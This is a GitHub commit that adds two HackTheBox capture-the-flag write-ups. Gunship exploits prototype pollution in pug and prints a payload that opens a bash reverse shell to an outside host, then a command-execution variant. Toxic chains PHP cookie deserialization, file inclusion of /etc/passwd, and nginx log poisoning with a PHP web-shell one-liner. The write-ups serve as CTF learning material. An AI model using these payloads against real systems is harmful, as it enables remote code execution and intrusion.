Add files via upload

This commit is contained in:
ARZ 2021-08-20 17:50:30 +05:00 committed by GitHub
parent 560dcaf551
commit f79ab6442e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
2 changed files with 167 additions and 0 deletions

80
HackTheBox/Gunship.md Normal file
View file

@ -0,0 +1,80 @@
# HackTheBox-Gunship
We are giving an archive file to download which is password protected with `hackthebox`
<img src="https://i.imgur.com/9AULt0y.png"/>
On extracting the archive we can some files , also let's look at the web page
<img src="https://i.imgur.com/B5VZE37.png"/>
At the bottom we can see an input field
<img src="https://i.imgur.com/zU2RzWx.png"/>
If we try to enter a random name it will tell us to enter the existing name of an artist
<img src="https://i.imgur.com/cD6OVRa.png"/>
We can see two artists names in Gunship's timeline
<img src="https://i.imgur.com/2o1liNP.png"/>
And these are valid
<img src="https://i.imgur.com/YreEn0D.png"/>
If we look at the source code of `index.js` we can clearly see which names it accepts
<img src="https://i.imgur.com/nGa059G.png"/>
But there's something else to note as well as this node js application is using `pug` module and we look at the version it's 3.0.0 which we can search on google for vulnerabilites which is vulnerable to `prototype pollution`
<img src="https://i.imgur.com/54sFkVk.png"/>
https://blog.p6.is/AST-Injection/#Pug
Now we cannot use the Poc which is used in the above link as we require to make a POST request and in this case we can't make any requests through ourselves as the express js would send 404 status code and won't deal with any request
<img src="https://i.imgur.com/oBF11kc.png"/>
So we could use `burp suite` to intercept the request and our exploit along with the data that is being submitted
```json
{
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
}
}
```
We may need to edit this as we can't get a reverse shell as we are given a public IP so we could just only try to execute commands
```json
{
"artist.name": "Westaway",
"__proto__.block":
{
"type": "Text",
"line": "test;process.mainModule.require('child_process').execSync(`id`)",
"val": "THIS IS THE VALUE"
}
}
```
<img src="https://i.imgur.com/DNgAuhI.png"/>
Here we cannot see the command that we want to execute so we need to use `return` keyword that would return the output of the command
<img src="https://i.imgur.com/HOGicBP.png"/>
It's returning in buffer format so we need to change the encoding and we can do that by adding `{encoding:'utf-8'}`
<img src="https://i.imgur.com/uGKJ2uy.png"/>
For the flag as the flag file name is a randomly generated name
<img src="https://i.imgur.com/u6hWHbz.png"/>
<img src="https://i.imgur.com/TPVcWWX.png"/>

87
HackTheBox/Toxic.md Normal file
View file

@ -0,0 +1,87 @@
# HackTheBox-Toxic
We are given an archive to download which inlcudes source code of web page
<img src="https://i.imgur.com/Nr0A5oM.png"/>
Looking at the web page we have no interaction with the page
<img src="https://i.imgur.com/BIv8Jlg.png"/>
<img src="https://i.imgur.com/HXjk5Nw.png"/>
So the next thing is to actually look at the source code which is given and that we extracted earlier
<img src="https://i.imgur.com/29C4jHK.png"/>
We have this `index.php` file which is using `preg_match` to find directory `Model` and in that it's going to grab a file which is passed trough `$name` parameter and then it's including that file using `include`
<img src="https://i.imgur.com/JTBDVbv.png"/>
Here an object is being made for the class name `PageModel` , if we look for other files we'll do see a file named PageModel.php which has the following contents
<img src="https://i.imgur.com/LHq4pL7.png"/>
It has public variable name called `$file` which will hold a file name to be included which will be called through magic function named `__destruct` which call it's self when the script reaches it's end basically it destorys the object.
<img src="https://i.imgur.com/UaNzTWV.png"/>
Coming back to index.php , that object is going to access the public variable `file` which will assign a string to it `/www/index.html` meaning that this variable now holds the index.html file which is going to be called in `include` function of the class meaning that this file will be displayed on the browser but we don't know yet how it's going to be passed.
<img src="https://i.imgur.com/1NvLluY.png"/>
Next a php session cookie is being set by encoding the variable's value to base64 and seriliazing it , `time()+60*60*24` just tells when the cookie is going to be expired and according this it will expire in 60 hours ,60 minutes and 24 seconds and `/` is telling the location for the cookie
<img src="https://i.imgur.com/im0ZfdS.png"/>
This part is important as now `$cookie` variable is going to hold decoded value meaning the serilized object and then it's going to be unserilized meaning that the proper file name will be passed into the destruct function
<img src="https://i.imgur.com/L7LQ2jj.png"/>
As you can see we have our serilized object so let's break down this
`O` - This tells us that this is an object, `9` - This is telling us that this object is of PageModel class having the lenght of 9 chracters
`1` - This tells us that there's only one object
`s` - This tells us that it's a string , `4` with four chracters and then again it tells us about the file name with it's absolute path that it's 15 characters long and it's a string value
So now I thought of if I could make php file having this content in it `<?php system($_GET['cmd']);?>` so then I could call that file name through changing the filename in cookie and decoding it back to base64 so it would be loaded through `__destruct` function but there's no interaction on the web page to upload files so this won't work like that
Now we can pass a file name into the cookie by replacing `/www/index.html` with the file name but we don't know a file that we can view so I'll go with `/etc/passwd` file which holds information for users on the linux system , for that we need to get the length for the file name
<img src="https://i.imgur.com/w3S37v0.png"/>
It's 11 characters so we'll do it like this
<img src="https://i.imgur.com/zZ5GQRz.png"/>
Now just replace the base64 encoded string in cookie field and we'll get `/etc/passwd` file to be loaded on the browser
<img src="https://i.imgur.com/vqp96NI.png"/>https://i.imgur.com/82bPzNN.png
Notice earlier in the archive file we had `config` folder
<img src="https://i.imgur.com/Tb8rcuc.png"/>
We have `nginx.conf` file meaning that proably this is being hosted through nginx and from the config file we can see that it is !
<img src="https://i.imgur.com/3FJJ44u.png"/>
We can try to poison nginx's access log file `/var/log/nginx/access.log`
<img src="https://i.imgur.com/82bPzNN.png"/>
<img src="https://i.imgur.com/2wMl2O5.png"/>
And boom
<img src="https://i.imgur.com/umPzF25.png"/>
Now it's left to poison them by adding php code un `User-Agent`
<img src="https://i.imgur.com/HSZ1YKC.png"/>
<img src="https://i.imgur.com/XhMJ3e5.png"/>
We can see the randomly generated file name for the flag so we can just use `cat` to get the contents